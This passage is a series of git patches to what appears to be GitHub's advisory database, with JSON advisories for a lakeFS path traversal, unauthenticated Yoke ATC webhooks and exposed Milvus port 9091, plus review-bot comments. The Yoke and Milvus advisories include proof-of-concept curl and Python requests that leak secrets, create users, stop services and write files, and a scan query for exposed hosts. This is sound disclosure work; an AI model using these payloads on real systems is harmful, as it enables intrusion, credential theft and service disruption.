This allowed attackers to use path traversal sequences in the object identifier to access files in other namespaces.\n\n**Example:** With base path `/data/lakefs` and namespace `local://repo1/userdata`:\n\n| Identifier | Resolved Path | Expected | Actual |\n|------------|---------------|----------|--------|\n| `file.txt` | `/data/lakefs/repo1/userdata/file.txt` | Allowed | Allowed |\n| `../secrets/key.txt` | `/data/lakefs/repo1/secrets/key.txt` | Blocked | **Vulnerable** |\n| `../../other-repo/data.txt` | `/data/lakefs/other-repo/data.txt` | Blocked | **Vulnerable** |\n\nThis vulnerability allows users with access to one namespace to read and write files in other namespaces within the same lakeFS deployment.\n\n## Impact\n\nAuthenticated lakeFS users can:\n\n- **Read and write files in sibling directories** that share the same path prefix as the storage directory (vulnerability 1)\n- **Access files across namespaces** by using path traversal in object identifiers (vulnerability 2)\n\nThis could allow attackers to:\n\n- Read sensitive data from other repositories/namespaces\n- Write malicious files to other namespaces\n- Read/write files in adjacent directories outside lakeFS storage\n- Potentially escalate privileges if writable directories are used by other services\n\nThis vulnerability **only affects** deployments using the local block adapter. Deployments using S3, GCS, Azure, or other object storage backends are **not affected**.\n\n## Patches\n\nFixed in version v1.77.0.\n\nThe fixes:\n1. Append a path separator to prefix checks, ensuring paths must be within the storage directory\n2. 
Add two-level path validation: verify both that namespace paths stay within the adapter's base path AND that resolved paths stay within their designated namespace\n\n## Workarounds\n\n- Configure the storage path with a unique name unlikely to be a prefix of other directories\n- Restrict filesystem permissions for the lakeFS process\n- Ensure no sensitive data exists in sibling directories\n\n## Credit\n\nDiscovered via CodeQL static analysis.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/treeverse/lakefs"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.77.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.76.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/security/advisories/GHSA-699m-4v95-rmpm"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/commit/cbc106275357302a834280f133265dc39f1384ce"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/treeverse/lakeFS"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/releases/tag/v1.77.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T16:16:04Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
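Review bot: The Workarounds section only mitigates the first issue: a uniquely named storage path, tighter filesystem permissions and keeping siblings clean do nothing against the namespace escape, where `../` in an object identifier resolves to another repository's directory inside the adapter's own base path. The record should say plainly that upgrading to 1.77.0 is the only fix for cross-namespace access, otherwise operators reading the workarounds may believe they are covered. On the fix itself, appending a separator to the prefix check is only sound if the compared path has been normalised first (e.g. `filepath.Clean`/`filepath.Abs` before the comparison), and a symlink placed inside the storage directory would still escape it; presumably the linked commit handles normalisation, but that is not visible from the advisory text and is worth confirming before treating the prefix change alone as sufficient.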
From 8de3c83068cc825555fc753979042e7bcd884076 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 17:17:07 +0000
Subject: [PATCH 07/36] Publish Advisories
GHSA-33mh-2634-fwr2
GHSA-87fh-rc96-6fr6
GHSA-965m-v4cc-6334
GHSA-jr94-gj3h-c8rf
GHSA-p6pv-q7rc-g4h9
GHSA-wj8p-jj64-h7ff
---
.../GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json | 2 +-
.../GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json | 6 +++++-
.../GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json | 15 ++++++++++++---
.../GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json | 8 ++++++--
.../GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json | 6 +++++-
.../GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json | 8 ++++++--
6 files changed, 35 insertions(+), 10 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
index a06c125cd8919..c2459ea5cf20f 100644
--- a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
+++ b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-33mh-2634-fwr2",
- "modified": "2026-02-12T14:22:46Z",
+ "modified": "2026-02-13T17:16:36Z",
"published": "2026-02-09T20:37:05Z",
"aliases": [
"CVE-2026-25765"
diff --git a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
index b654c6ebe59a7..277f68bdc730a 100644
--- a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-87fh-rc96-6fr6",
- "modified": "2026-02-07T00:32:04Z",
+ "modified": "2026-02-13T17:16:07Z",
"published": "2026-02-05T21:19:30Z",
"aliases": [
"CVE-2026-25758"
@@ -140,6 +140,10 @@
"type": "WEB",
"url": "https://github.com/spree/spree/commit/ff7cfcfcfe0c40c60d03317e1d0ee361c6a6b054"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_api/CVE-2026-25758.yml"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/spree/spree"
diff --git a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
index d2ecb5f8b36fb..3abcd13dcb9ec 100644
--- a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
+++ b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
@@ -1,14 +1,19 @@
{
"schema_version": "1.4.0",
"id": "GHSA-965m-v4cc-6334",
- "modified": "2026-02-12T22:06:36Z",
+ "modified": "2026-02-13T17:15:36Z",
"published": "2026-02-12T22:06:36Z",
"aliases": [
"CVE-2026-26055"
],
"summary": "Unauthenticated Admission Webhook Endpoints in Yoke ATC",
"details": "# Unauthenticated Admission Webhook Endpoints in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.\n\n**Recommended CWE**: CWE-306 (Missing Authentication for Critical Function)\n\n## Summary\n\nYoke ATC implements multiple Admission Webhook endpoints (`/validations/{airway}`, `/validations/resources`, `/validations/flights.yoke.cd`, `/validations/airways.yoke.cd`, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.\n\n## Details\n\nThe vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.\n\n**Vulnerable Endpoint Handlers** (`cmd/atc/handler.go:147-335`):\n```go\nmux.HandleFunc(\"POST /validations/{airway}\", func(w http.ResponseWriter, r *http.Request) {\n var review admissionv1.AdmissionReview\n if err := json.NewDecoder(r.Body).Decode(&review); err != nil {\n http.Error(w, fmt.Sprintf(\"failed to decode review: %v\", err), http.StatusBadRequest)\n return\n }\n // No authentication check - request is processed directly\n // ...\n})\n```\n\n**Additional Unauthenticated Endpoints**:\n- `/validations/resources` (`cmd/atc/handler.go:337-538`)\n- `/validations/external-resources` (`cmd/atc/handler.go:540-597`)\n- `/validations/airways.yoke.cd` (`cmd/atc/handler.go:599-636`)\n- 
`/validations/flights.yoke.cd` (`cmd/atc/handler.go:638-733`)\n- `/crdconvert/{airway}` (`cmd/atc/handler.go:61-145`)\n\nThe code lacks:\n1. TLS client certificate verification\n2. Request source validation (verifying requests come from kube-apiserver)\n3. Any form of authentication middleware\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat > /tmp/kind-config.yaml << 'EOF'\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\n**Step 4: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\n### Exploitation Steps\n\n**Step 1: Create attacker pod**\n```bash\nkubectl apply -f - < /tmp/malicious-review.json << 'EOF'\n{\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"kind\": \"AdmissionReview\",\n \"request\": {\n \"uid\": \"vul002-exploit-uid\",\n \"kind\": {\"group\": \"examples.com\", \"version\": \"v1\", \"kind\": \"Backend\"},\n \"resource\": {\"group\": \"examples.com\", \"version\": \"v1\", \"resource\": \"backends\"},\n \"name\": \"exploit-backend\",\n \"namespace\": \"default\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\"username\": \"attacker-from-pod\", \"groups\": [\"system:unauthenticated\"]},\n \"object\": {\n \"apiVersion\": \"examples.com/v1\",\n \"kind\": \"Backend\",\n \"metadata\": {\"name\": \"exploit-backend\", \"namespace\": 
\"default\"},\n \"spec\": {\"image\": \"nginx:latest\", \"replicas\": 1}\n }\n }\n}\nEOF\n\nkubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json\n```\n\nSend the request:\n```bash\nkubectl exec webhook-attacker -- curl -k -s -X POST \\\n https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \\\n -H \"Content-Type: application/json\" \\\n -d @/tmp/malicious-review.json\n```\n\nActual output from verification:\n```json\n{\"kind\":\"AdmissionReview\",\"apiVersion\":\"admission.k8s.io/v1\",\"request\":{\"uid\":\"vul002-normal-test\",\"kind\":{\"group\":\"examples.com\",\"version\":\"v1\",\"kind\":\"Backend\"},\"resource\":{\"group\":\"examples.com\",\"version\":\"v1\",\"resource\":\"backends\"},\"name\":\"vul002-normal-backend\",\"namespace\":\"default\",\"operation\":\"CREATE\",\"userInfo\":{\"username\":\"attacker-from-pod\",\"groups\":[\"system:unauthenticated\"]},\"object\":{\"apiVersion\":\"examples.com/v1\",\"kind\":\"Backend\",\"metadata\":{\"name\":\"vul002-normal-backend\",\"namespace\":\"default\"},\"spec\":{\"image\":\"nginx:latest\",\"replicas\":1}},\"oldObject\":null,\"options\":null},\"response\":{\"uid\":\"vul002-normal-test\",\"allowed\":false,\"status\":{\"metadata\":{},\"status\":\"Failure\",\"message\":\"applying resource returned errors during dry-run...\"}}}\n```\n\n**Step 4: Verify ATC logs**\n```bash\nkubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com\n```\n\nActual log output:\n```json\n{\"time\":\"2026-02-01T15:29:08.890991543Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"435ms\",\"validation\":{\"allowed\":false,\"status\":\"Invalid\"}}\n```\n\nThe `elapsed: 435ms` indicates WASM module execution occurred.\n\n### Expected Result\n\nThe attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any 
authentication. The ATC controller processes the request and executes the WASM module, proving that:\n1. No TLS client certificate is required\n2. No request source validation occurs\n3. The fake `userInfo` is accepted without verification\n4. WASM modules are executed based on unauthenticated requests\n\n## Impact\n\n**Vulnerability Type**: Missing Authentication / Authentication Bypass\n\n**Attack Prerequisites**:\n- Attacker has access to a pod within the cluster network\n- Network policies do not restrict access to the ATC service (common in default configurations)\n\n**Impact Assessment**:\n- **Confidentiality**: Medium - Attacker can trigger WASM execution which may access controller context data\n- **Integrity**: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources\n- **Availability**: Medium - Attacker can cause resource exhaustion through repeated requests\n\n**Attack Scenario**:\n1. Attacker compromises a pod or gains access to the cluster network\n2. Attacker sends crafted AdmissionReview requests directly to ATC webhook\n3. ATC processes requests without verifying they came from the API Server\n4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code\n5. 
Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges\n\n## Severity\n\n**CVSS v3.1 Score**: 7.5 (High)\n\n**Vector**: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\n- Attack Vector (AV): Network - Accessible from cluster network\n- Attack Complexity (AC): Low - Simple HTTP request\n- Privileges Required (PR): None - No authentication required\n- User Interaction (UI): None - Automatic processing\n- Scope (S): Unchanged\n- Confidentiality (C): None - Direct impact limited\n- Integrity (I): High - Can trigger unauthorized WASM execution\n- Availability (A): None - No direct availability impact\n\nNote: When combined with VUL-001, the overall impact increases significantly.\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that implement Admission Webhook endpoints without client authentication\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Network Policy**: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: atc-webhook-policy\n namespace: atc\nspec:\n podSelector:\n matchLabels:\n yoke.cd/app: atc\n policyTypes:\n - Ingress\n ingress:\n - from:\n - namespaceSelector:\n matchLabels:\n kubernetes.io/metadata.name: kube-system\n podSelector:\n matchLabels:\n component: kube-apiserver\n```\n\n2. **Service Mesh**: Use a service mesh (Istio, Linkerd) to enforce mTLS between services\n\n3. 
**Pod Security**: Implement strict pod security policies to limit which pods can be created in the cluster\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/\n- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
"affected": [
{
"package": {
@@ -35,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/yokecd/yoke/security/advisories/GHSA-965m-v4cc-6334"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26055"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/yokecd/yoke"
@@ -51,6 +60,6 @@
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-02-12T22:06:36Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T22:16:06Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json
index 8352be849afb8..e8b973a8fc6c9 100644
--- a/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json
+++ b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jr94-gj3h-c8rf",
- "modified": "2026-02-12T22:13:04Z",
+ "modified": "2026-02-13T17:15:48Z",
"published": "2026-02-12T22:13:04Z",
"aliases": [
"CVE-2026-26185"
@@ -59,6 +59,10 @@
"type": "WEB",
"url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26185"
+ },
{
"type": "WEB",
"url": "https://github.com/directus/directus/pull/26485"
@@ -83,6 +87,6 @@
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2026-02-12T22:13:04Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T22:16:07Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json b/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json
index ef61279e7c947..3aa9ca8632954 100644
--- a/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json
+++ b/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-p6pv-q7rc-g4h9",
- "modified": "2026-02-07T00:33:27Z",
+ "modified": "2026-02-13T17:16:21Z",
"published": "2026-02-05T21:13:24Z",
"aliases": [
"CVE-2026-25757"
@@ -117,6 +117,10 @@
"type": "WEB",
"url": "https://github.com/spree/spree/commit/ea4a5db590ca753dbc986f2a4e818d9e0edfb1ad"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_storefront/CVE-2026-25757.yml"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/spree/spree"
diff --git a/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json
index 6827582b45fe6..5704bba6e30b7 100644
--- a/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json
+++ b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-wj8p-jj64-h7ff",
- "modified": "2026-02-12T22:07:10Z",
+ "modified": "2026-02-13T17:15:43Z",
"published": "2026-02-12T22:06:45Z",
"aliases": [
"CVE-2026-26056"
@@ -40,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/yokecd/yoke/security/advisories/GHSA-wj8p-jj64-h7ff"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26056"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/yokecd/yoke"
@@ -52,6 +56,6 @@
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-02-12T22:06:45Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T22:16:06Z"
}
}
\ No newline at end of file
From 72d21846d34d5522e8d13a87d27529d037e973c2 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 17:19:08 +0000
Subject: [PATCH 08/36] Publish GHSA-7ppg-37fh-vcr6
---
.../2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
index a071acda2440b..bb867f815572c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
@@ -1,9 +1,11 @@
{
"schema_version": "1.4.0",
"id": "GHSA-7ppg-37fh-vcr6",
- "modified": "2026-02-11T19:49:44Z",
+ "modified": "2026-02-13T17:17:11Z",
"published": "2026-02-11T19:49:44Z",
- "aliases": [],
+ "aliases": [
+ "CVE-2026-26190"
+ ],
"summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise",
"details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). 
These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 ā `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service ā stop the proxy\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n 'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n 'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n 'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n 'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 ā Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n \"username\": \"attacker_user\",\n \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}\n\n# Create and 
delete collections, insert data ā all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** ā MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** ā Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** ā Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** ā Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** ā Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. 
**Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only ā does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).",
"severity": [
From fd8723f904a302133f0e49a1d880516b9a13904f Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 18:22:27 +0000
Subject: [PATCH 09/36] Publish GHSA-pm44-x5x7-24c4
---
.../2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json
index 8c5e98ce1e6a9..ea3ae3579b5d2 100644
--- a/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json
+++ b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-pm44-x5x7-24c4",
- "modified": "2026-02-11T21:40:07Z",
+ "modified": "2026-02-13T18:20:21Z",
"published": "2026-02-09T12:30:22Z",
"aliases": [
"CVE-2026-22922"
@@ -28,7 +28,7 @@
"introduced": "3.1.0"
},
{
- "fixed": "3.17.0"
+ "fixed": "3.1.7"
}
]
}
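Review bot: Changing `"fixed": "3.17.0"` to `"fixed": "3.1.7"` narrows the vulnerable range for this package from [3.1.0, 3.17.0) to [3.1.0, 3.1.7), so consumers that previously flagged 3.1.7 through 3.16.x as affected will now treat them as clean, yet nothing in the hunk or the commit message records what establishes 3.1.7 as the first fixed release. A commit-message line naming the upstream release or fix commit, or a reference entry pointing at it, would let downstream mirrors verify the correction instead of trusting the bot. If 3.17.0 was simply a typo for the intended 3.1.7, stating that is enough. The enclosing `affected` entry continues outside the hunk.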
From 90f44678b6bbbed510aa44dc4c3d036d7d0cb276 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 18:32:38 +0000
Subject: [PATCH 10/36] Advisory Database Sync
---
.../GHSA-23wj-fq4f-57vr.json | 6 ++-
.../GHSA-54jh-gr2j-w5jp.json | 13 ++++-
.../GHSA-9cr4-jvh8-pr25.json | 6 ++-
.../GHSA-c6wh-345m-mrfm.json | 6 ++-
.../GHSA-g4fr-g4v5-cfmc.json | 6 ++-
.../GHSA-jgcm-pqcv-h934.json | 6 ++-
.../GHSA-f6p2-2572-4pjp.json | 6 ++-
.../GHSA-m77w-6vjw-wh2f.json | 6 ++-
.../GHSA-2g3f-rmh8-cj3f.json | 6 ++-
.../GHSA-x34v-6wh4-m93r.json | 6 ++-
.../GHSA-5mqf-9q34-g8c2.json | 6 ++-
.../GHSA-9w8w-fgjg-w972.json | 6 ++-
.../GHSA-6v67-599p-fprc.json | 6 ++-
